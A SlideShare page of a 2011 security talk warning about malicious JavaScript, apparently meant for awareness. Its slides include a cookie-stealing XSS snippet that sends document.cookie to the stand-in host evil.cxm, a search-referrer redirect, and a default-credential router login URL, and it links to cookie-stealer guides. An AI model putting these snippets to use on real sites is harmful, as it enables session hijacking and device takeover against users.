JAVASCRIPT goneWILD Akash Mahajan | jsFoo 2011
WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
Don’t worry No Dirty Pictures I swear this presentation doesn’t have dirty pictures in it.
DISCLAIMER This presentation is low on technical content.  Tech Lite
Why bother? INCEPTION Planting the seed of an idea.
What is the idea? JavaScript code showing up in  unexpected  places can have  unintended  consequences. Can you have fun a...
Wild Idea #1 <ul><ul><li>Stealing a session cookie </li></ul></ul><ul><ul><ul><li><script>  </li></ul></ul></ul><ul><ul><u...
Wild Idea #1.5 One can steal username and password with JS in a login form.
Wilder Idea #2 <ul><ul><li>Stealing the Google page rank </li></ul></ul><ul><ul><ul><li>if(document.referrer == 'google') ...
Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
Wildest Idea #3 <ul><ul><li>Login to an internal ADSL router website using a default username and password. </li></ul></ul...
Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
His WILDNESS!!! Samy Kamkar wrote JS code to get more friends in MySpace.  At one point he had over a million friends in l...
Jumping to conclusions JavaScript can be pretty wild if it shows up in  unexpected  places. The very idea that  outside co...
PIMPING MYSELF/ QnA <ul><li>Akash Mahajan  </li></ul><ul><ul><li>Web Security Consultant </li></ul></ul><ul><li>http://aka...
References, Attribution <ul><ul><li>Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat...
Upcoming SlideShare
Loading in …5
×

javascript-gone-wild-withreferences-attributions-111003035611-php

656 views

Published on

Published in: Education, Technology
3 Comments
2 Likes
Statistics
Notes
No Downloads
Views
Total views
656
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
7
Comments
3
Likes
2
Embeds 0
No embeds

No notes for slide

javascript-gone-wild-withreferences-attributions-111003035611-php

  1. JAVASCRIPT goneWILD Akash Mahajan | jsFoo 2011
  2. WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
  3. Don’t worry No Dirty Pictures I swear this presentation doesn’t have dirty pictures in it.
  4. DISCLAIMER This presentation is low on technical content. Tech Lite
  5. Why bother? INCEPTION Planting the seed of an idea.
  6. What is the idea? JavaScript code showing up in unexpected places can have unintended consequences. Can you have fun and profit from this somehow?
  7. Wild Idea #1 <ul><ul><li>Stealing a session cookie </li></ul></ul><ul><ul><ul><li><script> </li></ul></ul></ul><ul><ul><ul><li>ifrm = document.createElement(&quot;IFRAME&quot;); </li></ul></ul></ul><ul><ul><ul><li>ifrm.setAttribute(&quot;src&quot;,&quot;http://evil.cxm/cookiestealer?stolencookie&quot; + document.cookie); </li></ul></ul></ul><ul><ul><ul><li>document.body.appendChild(ifrm); </li></ul></ul></ul><ul><ul><ul><li></script> </li></ul></ul></ul>Firesheep also does session hijacking by stealing cookies in transit.
  8. Wild Idea #1.5 One can steal username and password with JS in a login form.
  9. Wilder Idea #2 <ul><ul><li>Stealing the Google page rank </li></ul></ul><ul><ul><ul><li>if(document.referrer == 'google') { </li></ul></ul></ul><ul><ul><ul><li>var locationurl = 'http://evil.cxm/google1.php'; </li></ul></ul></ul><ul><ul><ul><li>location.href = locationurl; </li></ul></ul></ul><ul><ul><ul><li>} </li></ul></ul></ul>Do you regularly check the link you get from google to your site?
  10. Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
  11. Wildest Idea #3 <ul><ul><li>Login to an internal ADSL router website using a default username and password. </li></ul></ul><ul><ul><ul><li>var loginUrl = ‘http://admin:admin@192.168.1.1/’; </li></ul></ul></ul><ul><ul><ul><li>document.location = loginUrl; </li></ul></ul></ul>Obviously you all have changed the default password long back, right
  12. Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
  13. His WILDNESS!!! Samy Kamkar wrote JS code to get more friends in MySpace. At one point he had over a million friends in less than 24 hours
  14. Jumping to conclusions JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is radical and dangerous.
  15. PIMPING MYSELF/ QnA <ul><li>Akash Mahajan </li></ul><ul><ul><li>Web Security Consultant </li></ul></ul><ul><li>http://akashm.com | @makash </li></ul><ul><li>akashmahajan@gmail.com | 9980527182 </li></ul>
  16. References, Attribution <ul><ul><li>Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference. </li></ul></ul><ul><ul><ul><li>http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf </li></ul></ul></ul><ul><ul><li>Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse under Creative Commons. </li></ul></ul><ul><ul><li>Some Reference Links </li></ul></ul><ul><ul><ul><li>JavaScript History Stealing Attack </li></ul></ul></ul><ul><ul><ul><ul><li>http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html </li></ul></ul></ul></ul><ul><ul><ul><li>Samy is my Hero – MySpace XSS Worm </li></ul></ul></ul><ul><ul><ul><ul><li>http://namb.la/popular/tech.html </li></ul></ul></ul></ul><ul><ul><ul><li>JavaScript to steal session cookies </li></ul></ul></ul><ul><ul><ul><ul><li>http://jehiah.cz/a/xss-stealing-cookies-101 </li></ul></ul></ul></ul><ul><ul><ul><ul><li>http://www.go4expert.com/forums/showthread.php?t=17066 </li></ul></ul></ul></ul><ul><ul><ul><ul><li>http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ </li></ul></ul></ul></ul><ul><ul><ul><li>Trailer of the Movie ‘The Dirty Picture’ </li></ul></ul></ul><ul><ul><ul><ul><li>http://www.youtube.com/thedirtypicturefilm </li></ul></ul></ul></ul><ul><ul><ul><li>Ending of the movie inception explained. </li></ul></ul></ul><ul><ul><ul><ul><li>http://screenrant.com/inception-spoilers-discussion-kofi-68330/ </li></ul></ul></ul></ul><ul><ul><li>06 - Grossman . pdf </li></ul></ul>

×